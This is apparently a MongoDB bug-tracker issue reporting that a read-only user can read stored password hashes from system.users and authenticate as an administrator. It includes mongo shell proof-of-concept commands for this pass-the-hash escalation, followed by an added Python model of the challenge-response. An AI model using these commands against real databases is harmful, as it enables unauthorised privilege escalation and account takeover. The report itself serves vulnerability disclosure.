  1. Core Server
  2. SERVER-6031

read only user can get write priority


Details

    • Bug
    • Status: Closed
    • Critical - P2
    • Resolution: Duplicate
    • None
    • None
    • Security
    • None
    • all
    • ALL

    Description

      A read-only user can get write priority by accessing other users' pwd hash.

      sample:
      > db.system.users.find()
      { "_id" : ObjectId("4fd068ae34ae311cd063f9b2"), "user" : "sa", "readOnly" : false, "pwd" : "84c689ded211fb631fd5f5dedc5d4539" }
      { "_id" : ObjectId("4fd07496cf5f726c2428ac3a"), "user" : "ro", "readOnly" : true, "pwd" : "d8883d4475561e209dda05a54a98c8f6" }

      > db.$cmd.findOne({getnonce:1})
      { "nonce" : "9892be9572e9851e", "ok" : 1 }

      > db.runCommand({ authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") })
      { "ok" : 1 }
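
The exchange in the report, modelled in memory as an added example (not part of the original issue and not MongoDB's code), to show why the stored `pwd` value is password-equivalent in this challenge-response. `ModelServer`, `auth_key` and the sample password are hypothetical; the `md5(user + ":mongo:" + password)` storage format and single-use nonces are stated as assumptions of the model.

```python
import hashlib
import secrets


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def stored_digest(user: str, password: str) -> str:
    # MONGODB-CR keeps md5(user + ":mongo:" + password) in system.users.pwd.
    return md5_hex(f"{user}:mongo:{password}")


def auth_key(nonce: str, user: str, pwd_digest: str) -> str:
    # Same expression as the report: hex_md5(nonce + user + pwd).
    return md5_hex(nonce + user + pwd_digest)


class ModelServer:
    """In-memory model of getnonce/authenticate; hypothetical, not MongoDB code."""

    def __init__(self, users):
        self.users = dict(users)   # user -> stored pwd digest
        self.outstanding = set()   # nonces issued but not yet used

    def getnonce(self) -> str:
        nonce = secrets.token_hex(8)
        self.outstanding.add(nonce)
        return nonce

    def authenticate(self, user: str, nonce: str, key: str) -> bool:
        if nonce not in self.outstanding:
            return False
        self.outstanding.discard(nonce)  # assumption: a nonce is single-use
        pwd = self.users.get(user)
        # The expected key is derived from the stored digest, never the password.
        return pwd is not None and secrets.compare_digest(key, auth_key(nonce, user, pwd))


def demo() -> dict:
    password = "constructed-password"          # constructed sample value
    digest = stored_digest("sa", password)     # what system.users would hold
    server = ModelServer({"sa": digest})
    n1 = server.getnonce()
    knows_password = server.authenticate("sa", n1, auth_key(n1, "sa", stored_digest("sa", password)))
    n2 = server.getnonce()
    key2 = auth_key(n2, "sa", digest)          # built from the digest alone
    knows_digest_only = server.authenticate("sa", n2, key2)
    replayed = server.authenticate("sa", n2, key2)
    return {"password": knows_password, "digest_only": knows_digest_only, "replay": replayed}
```

The nonce rejects a replayed key, but it gives no protection once the stored digest itself is readable, so read access to `system.users` has to be treated as access to credentials.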

            People

              Unassigned Unassigned
              syre xie zhenye